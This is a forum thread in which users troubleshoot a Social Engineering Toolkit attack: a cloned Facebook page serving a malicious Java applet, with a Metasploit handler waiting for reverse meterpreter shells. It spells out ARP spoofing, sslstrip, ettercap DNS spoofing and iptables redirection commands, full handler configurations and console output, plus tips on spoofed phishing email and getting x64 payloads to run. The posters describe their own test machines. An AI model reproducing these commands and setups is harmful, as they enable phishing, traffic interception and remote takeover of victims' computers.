Social Engineering Fake Website not showing up on Victims machine

[marthafocker]

The attackers IP address is 192.168.1.100. When I enter the ip address (http://192.168.1.100) on the attackers machine the fake website shows up; however, when I enter the ip address (http://192.168.1.100) on my victim laptop and desktop computers, there is no website but a blank page.

I've watched alot of tutorials and they didnt mention needing to ARP the victim computers for the website to appear. However, I tried this approach. So I went ahead and ARPed the victim computers and set up sslstrip with the following commands and the website shows up on my victim machines; however, metasploit does not seem to be listening to the interaction as I have accepted the java applet on my victim machines but there is no notification on the msf console.

These are the commands that brought up the website on the victim comps at the 192.168.1.100 ip address but still did not work with the msfconsole

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
python sslstrip.py -a
arpspoof -i wlan0 -t [victim ip] [Router ip]
ettercap -T -q -i wlan0 -P dns_spoof

Note: I can do the attack completely without ettercap of course, but as soon as I take out sslstrip, the website stops loading again on the victims comp

Here are the settings I've chosen for the website clone


[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Method
4. Return to the previous menu

Enter your choice (press enter for default): 1
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: Welcome to Facebook


Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable Specify a path for your own executable

Enter choice (hit enter for default): 2

For the next option i choose the multiencoder number 15

When it asks for Port to listen on I enter default of 443


msf console opens:Nothing changes after I accept the java applet on my victim comp. This Test worked fine before...My hard drive has crashed since and now I cant duplicate the successful results.

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.100
LHOST => 192.168.1.100
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING x86/countdown
ENCODING => x86/countdown
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:443[*] Starting the payload handler...
msf exploit(handler) >

Conclusion: Website not showing on victims computers until ARP and sslstrip are introduced; however, metasploit does not seem to be able to hear when sslstrip is running. Possible IP table issue? Would appreciate your input...

***Edit: I have fixed the IP tables so that the website appears on the victims machine without ARPing the victims computer and using sslstrip simpy by rebooting. However, still nothing is happening with Metasploit still after I accept the Java applet. Any ideas what I'm leaving out?

Update 2: The test seems to be working flawlessly on windows xp comps. I thought with the latest update that the software said that windows 7 was now vulnerable as well. Perhaps not. Sometimes Randomly the msf will announce it's sending but no sessions are created. Most of the time when I accept the java applet with my windows 7 laptop nothing happens at all.

***Another Engineering Social Toolkit Error I'm encountering is with sendmail which has a history of giving alot of beginners such as myself alot of problems. I've been reading up on it but I ran into the latest error of "Something went wrong, printing the error: (530: '5.7.0 MUST ISSUE A STARTTLS COMMAND FIRST . I am attempting to send with a Gmail account.

[relik]

Couple of things:

Not sure why it wouldn't work on Windows 7 for you, are you selecting an x64 based payload if your using a x64 based OS? I have it running on mine without a hitch...

In the instance of your website, you shouldn't need to bother with ARP or SSLStrip, all SET does is bind to '' on all interfaces, you can force it to bind to a specific IP, try editing the config/set_config and turn AUTO_DETECT=ON to AUTO_DETECT=OFF and when SET loads, try configuring your interface manually, I've seen that be an issue sometimes..

SENDMAIL is only used when spoofing source addresses when sending emails, if your integrating into GMAIL, I've seen that STARTTLS error before, are you running the latest version of SET? If so, I must have no fixed it, some gmail smtp servers require you to use STARTTLS to enable secure transport, others don't and won't accept it, its been a weird quirk to work with on gmail.. Let me know and I'll try to fix.

In the instance of sending to GMAIL, a sendmail attack won't work, make sure the config/set_config SENDMAIL=OFF is turned on, GMAIL does reverse lookups, so spoofing your source email address won't work properly.

Hope that helps.

ReL

[marthafocker]

Thanks for your reply Relik. I am running a 64 bit windows 7 system. I have tried all the payloads one by one and even with different encodings the only one that was working fine was option 8 the egress Buster with multiencoding. The Egress buster worked perfectly on my windows 7 system and also the XP desktop. And now for some reason even that payload is not executing and that worked fine. I'm testing by simply typing in the local ip address. The web page comes up, java applet accepted, no response from metasploit and also the black box that used to flash up really quickly when it was successful with the egress buster has stopped appearing now. I have sendmail configured to ON and am using your latest updated version of the Social Engineering Toolkit and am getting the STARTTLS error. Of course e-mails send fine without sendmail, I see so many problems throughout posts with it. I'm not sure why the results are inconsistent. Sometimes when the website is launched the website does not appear just the files. Also when I create encoded payloads for USB/CD/ etc. the file does not execute on my windows 7 computer. I have tried x64 payloads as well the others, I have tried them all. I get errors such as compilation error or that the exe may be meant for a 32 bit system. I just don't understand why the Egress Buster isn't working now when it was working fine before. I don't get any warnings from my AV or Firewall and I haven't gotten any updates from windows since it was working. In addition, My wireless adapter lights up when the java applet is accepted on my attackers machine but msfconsole seems to have a deaf ear.

Thanks for any input.

***Update: I found something out even more interesting. You know how I couldnt understand the inconsistencies of Egress Buster no longer working. I realized that I had a Tor browser open on my windows 7 machine when I finally got a successful shell. Obviously I did not to go to the local ip address on the tor browser but I did on both the internet explorer 8 and the regular firefox browser. The handler began sending again and created a session again just because the tor window was open. I tested this with the other payloads and while there is a connection to tor all payloads were successful except for the x64 payloads which still do not send. When the tor browser is closed my computer is immuned to the java applet attack. How do I get this attack working against my windows 7 64 bit laptop when the tor window is not open. Why are the x64 payloads not working. Here is the connections that were successfully made and below is an example of the x64 payloads that do nothing.


192.168.1.101:443 -> 192.168.1.107:51939
192.168.1.101:1 -> 192.168.1.107:51789
192.168.1.101:443 -> 192.168.1.107:52047


1. Windows Shell Reverse_TCP Spawn a command shell on victim and s
end back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim a
nd send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send
back to attacker.
4. Windows Bind Shell Execute payload and create an accepti
ng port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP I
nline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TC
P Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows
x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a
port home via multiple ports
9. Import your own executable Specify a path for your own executabl
e

Enter choice (hit enter for default): 5
[-] Enter the PORT of the listener (enter for default):
Created by msfpayload (http://www.metasploit.com).
Payload: windows/x64/shell_bind_tcp
Length: 505
Options: LHOST=192.168.1.101,LPORT=443
When the payload is downloaded, you will want to connect to the victim directly.
************************************************** ******
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
************************************************** ******

Enter choice yes or no: no

************************************************** *
Web Server Launched. Welcome to the SET Web Attack.
************************************************** *

[--] Tested on IE6, IE7, IE8 and FireFox [--][*] Launching MSF Listener...[*] This may take a few to load MSF...

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 542 exploits - 257 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9117 updated today (2010.04.22)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/shell_bind_tcp
PAYLOAD => windows/x64/shell_bind_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.101
LHOST => 192.168.1.101
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING x86/countdown
ENCODING => x86/countdown
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.[*] Started bind handler[*] Starting the payload handler...
msf exploit(handler) >

Questions: Why are the x64 payloads not working on my Windows 7 machine. I've tried a 64 bit windows vista machine as well and they have failed to execute. I have even tried making my own executable x64 meterpreter payload and it has failed to execute when clicking it on my desktop. What am I doing wrong? How do I get the x64 payloads to work on the 64 bit systems?

Error: The error message I get from windows 7 is java.exe is not working please send information.

[marthafocker]

(Bump) Is anyone having success with using any payloads period on windows 7 64 bit or vista 64 bit? I dont own any 32 bit versions of windows 7 or vista so I can't test. When i get another adapter I'll do a virtual windows 7 and see if I can test it out. So I'm curious if the payloads would work on the 32 bit versions.

So please post if you notice something I'm doing wrong or which payloads you have had success with using against 64 bit windows 7 and vista to get a shell.

Update: I am able to successfully exploit Windows 7 64 bit and Vista using the Social engineering program. For some reason the listener that SET provides on my copy of backtrack does not respond. So I concurrently set up my own exploit/multi/handler listener and that one is able to send and create a session while SET's is still deaf for some reason. Now to learn and practice creating and encoding payloads on my own

[sabotage]

[BUMP]

I'm having the same issue. I have both a Windows 7 [x32] and XP [32] VM's that used to work fine, but now, the websites load without pictures, and the java applet executes, but there is not reverse connection made. I checked from my linux boxes and the sites appear fine, but no pictures still on the windows machines. It is really aggravating, because it worked before and I was so excited that I didn't have to make my own websites and use jabra's malicious java applet anymore. ReL1K said that arp_cache poisoning may be the issue, since I'm using ettercap to redirect the clients, but I don't know how else I would redirect them to the site... Anyone have any ideas? Please help, because I love this toolkit!